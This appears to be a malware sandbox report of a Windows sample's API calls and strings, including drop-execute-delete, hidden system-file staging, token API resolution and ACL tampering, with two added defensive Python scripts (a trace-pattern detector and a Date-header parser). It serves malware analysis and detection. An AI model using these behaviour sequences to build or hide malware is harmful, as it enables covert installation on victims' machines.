                                                                                        • API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 4131120076-2980165447
                                                                                        • Opcode ID: e18185d0f37ace2058eb608823ad36cbc71581f24a02a40a50f5e6d881590964
                                                                                        • Instruction ID: c4e01e0c9c22f42140b45f86cbdbc152d24ce0e59ed2090f1037bb69612005af
                                                                                        • Opcode Fuzzy Hash: e18185d0f37ace2058eb608823ad36cbc71581f24a02a40a50f5e6d881590964
                                                                                        • Instruction Fuzzy Hash: 0501A27294020877EA103F62EC47F9F3F1DEB44728F00483AF619790D2D9BA95709AAC
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
                                                                                        • GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
                                                                                        • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastSleep
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 408151869-2980165447
                                                                                        • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                        • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                        • WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID: ,k@
                                                                                        • API String ID: 3934441357-1053005162
                                                                                        • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                        • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                        APIs
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
                                                                                        • Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShellSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4194306370-0
                                                                                        • Opcode ID: 3372c8ca0f183eb5491d8b73672d2af1eba7a86cb059b25099cdfc4087d6fc87
                                                                                        • Instruction ID: 2238cefa34e52eac0eed51a1b9fc18e9663c37cde2c16e9a3df151323357230f
                                                                                        • Opcode Fuzzy Hash: 3372c8ca0f183eb5491d8b73672d2af1eba7a86cb059b25099cdfc4087d6fc87
                                                                                        • Instruction Fuzzy Hash: E941EE718083497EEB269664988C7E73BA49B52300F2809FFD492B72D3D7BC4D818759
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02610223,?,?), ref: 02610E19
                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02610223,?,?), ref: 02610E1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction ID: 323a148d031aa8979a0654940c3340b49206a3e0f742dbfe92ff6cd918eee192
                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction Fuzzy Hash: 25D0123114512877DB002A95DC09BCD7B1CDF05B66F048011FB0DD9180C770954046E5
                                                                                        APIs
                                                                                          • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                          • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                          • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                          • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                        • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1823874839-0
                                                                                        • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                        • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                        APIs
                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02610929
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 560597551-0
                                                                                        • Opcode ID: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction ID: 46c7c7c6dcd93c711cbd188b681eb9ae36fa97d9339837816e323f92b9b16bc3
                                                                                        • Opcode Fuzzy Hash: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction Fuzzy Hash: 9F90043034437511DC3035DC0C01F4500133741734F7047307533DD1D0C54157004117
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02678D76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Offset: 02669000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction ID: 1a9c701d81292baff1cf18cab14a89e24b6036db34bb63cf2f323b8052fb432a
                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction Fuzzy Hash: 3D113C79A00208EFDB01DF98C989E99BFF5AF08350F158094F9489B361D371EA90EF80
                                                                                        APIs
                                                                                        • closesocket.WS2_32(?), ref: 0040CA4E
                                                                                        • closesocket.WS2_32(?), ref: 0040CB63
                                                                                        • GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
                                                                                        • WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
                                                                                        • CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
                                                                                        • wsprintfA.USER32 ref: 0040CD21
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
                                                                                        • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040CD98
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040CD9D
                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040CDC4
                                                                                        • CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 0040CFEF
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 0040D033
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040D10C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040D19C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
                                                                                        • CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
                                                                                        • closesocket.WS2_32(?), ref: 0040D56C
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040D577
                                                                                        • ExitProcess.KERNEL32 ref: 0040D583
                                                                                        • wsprintfA.USER32 ref: 0040D81F
                                                                                          • Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B
                                                                                        • closesocket.WS2_32(?), ref: 0040DAD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                        • String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                        • API String ID: 562065436-3791576231
                                                                                        • Opcode ID: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
                                                                                        • Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
                                                                                        • Opcode Fuzzy Hash: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
                                                                                        • Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C
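The API list above for the function at 0040CA4E-0040DAD5 is the sample's install routine as the sandbox saw it: a file is written under GetTempPathA with GENERIC_WRITE (0x40000000) and CREATE_ALWAYS (2), run through CreateProcessA with CREATE_NO_WINDOW (0x08000000), waited on for 0xEA60 ms and deleted; then files under the system directory have their attributes reset to FILE_ATTRIBUTE_NORMAL (0x80), are rewritten, and are set FILE_ATTRIBUTE_HIDDEN (0x2). The script below is an added example, not part of the Joe Sandbox report or of the sample: it turns those two ordered call patterns into detection rules run over an API-call trace. The trace text, the rule names and the one-call-per-line format are constructed for the example; only the API names and constant argument values come from the listing.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Win32 constants seen as literal arguments in the report's API list.
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 2
CREATE_NO_WINDOW = 0x08000000
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_NORMAL = 0x80

# Constructed API trace (not sandbox output): one call per line, mirroring the
# order and constant arguments listed for the function at 0x40CA4E..0x40DAD5.
SAMPLE_TRACE = """\
closesocket(s)
GetTempPathA(0x120, buf)
CreateFileA(tmp_path, 0x40000000, 0, 0, 2, 0, 0)
WriteFile(h, buf, 0xE8, written, 0)
CloseHandle(h)
wsprintfA(cmdline, fmt, tmp_path)
CreateProcessA(0, cmdline, 0, 0, 0, 0x08000000, 0, 0, si, pi)
WaitForSingleObject(pi.hProcess, 0xEA60)
CloseHandle(pi.hProcess)
CloseHandle(pi.hThread)
DeleteFileA(tmp_path)
GetSystemDirectoryA(sysdir, 0x100)
lstrcatA(sysdir, name)
SetFileAttributesA(sysdir, 0x80)
CreateFileA(sysdir, 0xC0000000, 0, 0, 2, 0x80, 0)
WriteFile(h, payload, size, written, 0)
CloseHandle(h)
SetFileAttributesA(sysdir, 0x2)
"""

# Constructed benign trace: a read-only config open that must not match.
BENIGN_TRACE = """\
CreateFileA(cfg_path, 0x80000000, 1, 0, 3, 0x80, 0)
ReadFile(h, buf, 0x100, read, 0)
CloseHandle(h)
"""

CALL_RE = re.compile(r"^(\w+)\((.*)\)$")


def parse_trace(text: str) -> List[Tuple[str, List]]:
    """Parse 'Api(arg, arg, ...)' lines; numeric args become ints, the rest stay strings."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue
        name, raw = m.groups()
        args = []
        for a in raw.split(","):
            a = a.strip()
            try:
                args.append(int(a, 0))
            except ValueError:
                args.append(a)
        calls.append((name, args))
    return calls


def _int_at(args: List, i: int) -> Optional[int]:
    return args[i] if i < len(args) and isinstance(args[i], int) else None


def has_flag(args: List, i: int, mask: int) -> bool:
    v = _int_at(args, i)
    return v is not None and (v & mask) == mask


def equals(args: List, i: int, value: int) -> bool:
    return _int_at(args, i) == value


Step = Tuple[str, Optional[Callable[[List], bool]]]

RULES: Dict[str, List[Step]] = {
    # temp file created for writing, executed without a window, then removed
    "drop_execute_delete": [
        ("CreateFileA", lambda a: has_flag(a, 1, GENERIC_WRITE) and equals(a, 4, CREATE_ALWAYS)),
        ("WriteFile", None),
        ("CreateProcessA", lambda a: has_flag(a, 5, CREATE_NO_WINDOW)),
        ("DeleteFileA", None),
    ],
    # attributes cleared to NORMAL, file rewritten, then marked HIDDEN
    "hidden_payload_staging": [
        ("SetFileAttributesA", lambda a: equals(a, 1, FILE_ATTRIBUTE_NORMAL)),
        ("CreateFileA", lambda a: has_flag(a, 1, GENERIC_WRITE)),
        ("WriteFile", None),
        ("SetFileAttributesA", lambda a: equals(a, 1, FILE_ATTRIBUTE_HIDDEN)),
    ],
}


def match_sequence(calls: List[Tuple[str, List]], steps: List[Step]) -> Optional[List[int]]:
    """Ordered, not necessarily adjacent, subsequence match; returns call indices or None."""
    hits, pos = [], 0
    for api, pred in steps:
        while pos < len(calls):
            name, args = calls[pos]
            pos += 1
            if name == api and (pred is None or pred(args)):
                hits.append(pos - 1)
                break
        else:
            return None
    return hits


def scan(trace_text: str) -> Dict[str, List[int]]:
    """Return {rule_name: [matching call indices]} for every rule that fires."""
    calls = parse_trace(trace_text)
    found = {}
    for rule_name, steps in RULES.items():
        hit = match_sequence(calls, steps)
        if hit is not None:
            found[rule_name] = hit
    return found


if __name__ == "__main__":
    for rule, idx in scan(SAMPLE_TRACE).items():
        print(rule, "->", idx)
```

The matcher deliberately tolerates intervening calls (CloseHandle, wsprintfA, lstrcatA) because the report shows them between the interesting steps; the predicates key on the access mask, creation disposition and creation flags rather than on paths, which the listing only shows as `?`.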
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                        • GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                        • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
                                                                                        • GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
                                                                                        • GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
                                                                                        • GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
                                                                                        • GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
                                                                                        • GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
                                                                                        • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
                                                                                        • GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
                                                                                        • GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
                                                                                        • GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
                                                                                        • GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                        • API String ID: 2238633743-3228201535
                                                                                        • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                        • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                        • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                        • wsprintfA.USER32 ref: 0040B3B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                        • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                        • API String ID: 766114626-2976066047
                                                                                        • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                        • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
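The function at 0040B2B3-0040B3B7 combines GetLocalTime, GetTimeZoneInformation and the wsprintfA format `%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u` with the Sun..Sat and Jan..Dec tables from its string list; that layout is the RFC 5322 `Date:` header format (e.g. `Wed, 21 Aug 2024 13:05:07 +0200`). The code below is an added example, not part of the report or of the sample: it reproduces the formatter from a local time and a TIME_ZONE_INFORMATION.Bias value, and adds a strict parser a mail gateway could use to recognise exactly this layout. The Bias convention (UTC = local + Bias, in minutes) is the documented Windows one; that the sample derives its zone suffix from Bias this way, and the sample timestamps, are assumptions for the example.

```python
import re
from datetime import datetime, timedelta

# Tables in SYSTEMTIME order (wDayOfWeek: Sunday = 0), as in the sample's string list.
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]
MONTHS = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
          "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]


def rfc822_date(local: datetime, bias_minutes: int) -> str:
    """Render '%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u' from a local time.

    bias_minutes follows TIME_ZONE_INFORMATION.Bias (UTC = local + Bias), so the
    printed zone is its negation. Assumption: the sample derives the suffix this way.
    """
    offset = -bias_minutes
    sign = "+" if offset >= 0 else "-"
    hh, mm = divmod(abs(offset), 60)
    wday = DAYS[(local.weekday() + 1) % 7]   # Python Monday=0 -> SYSTEMTIME Sunday=0
    return (f"{wday}, {local.day} {MONTHS[local.month - 1]} {local.year} "
            f"{local.hour:02d}:{local.minute:02d}:{local.second:02d} {sign}{hh:02d}{mm:02d}")


def to_utc(local: datetime, bias_minutes: int) -> datetime:
    """UTC instant for a local time under the given Bias."""
    return local + timedelta(minutes=bias_minutes)


DATE_RE = re.compile(
    r"^(Sun|Mon|Tue|Wed|Thu|Fri|Sat), (\d{1,2}) "
    r"(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec) (\d{4}) "
    r"(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$")


def parse_rfc822_date(value: str) -> datetime:
    """Parse a header in the sample's exact layout back to naive UTC.

    Rejects other RFC 5322 spellings (named zones, comments, padded days) and a
    weekday that disagrees with the date, which a hand-built header can get wrong.
    """
    m = DATE_RE.match(value)
    if not m:
        raise ValueError("not in the sample's Date layout: %r" % value)
    wday, day, mon, year, hh, mi, ss, sign, oh, om = m.groups()
    local = datetime(int(year), MONTHS.index(mon) + 1, int(day), int(hh), int(mi), int(ss))
    if DAYS[(local.weekday() + 1) % 7] != wday:
        raise ValueError("weekday %s does not match %s" % (wday, local.date()))
    offset = timedelta(hours=int(oh), minutes=int(om))
    return local - offset if sign == "+" else local + offset


def looks_like_sample_date(value: str) -> bool:
    """True only for headers this formatter could have produced."""
    try:
        parse_rfc822_date(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample: 2024-08-21 13:05:07 local, Bias -120 (UTC+2).
    print(rfc822_date(datetime(2024, 8, 21, 13, 5, 7), -120))
```

The round trip (format, then parse) gives back the UTC instant, which is what a detection pipeline should compare against the receiving server's clock; a `Date:` header far from the transit time, or with a weekday that does not match the date, is a common artefact of locally generated mail.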
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                        • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                        • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
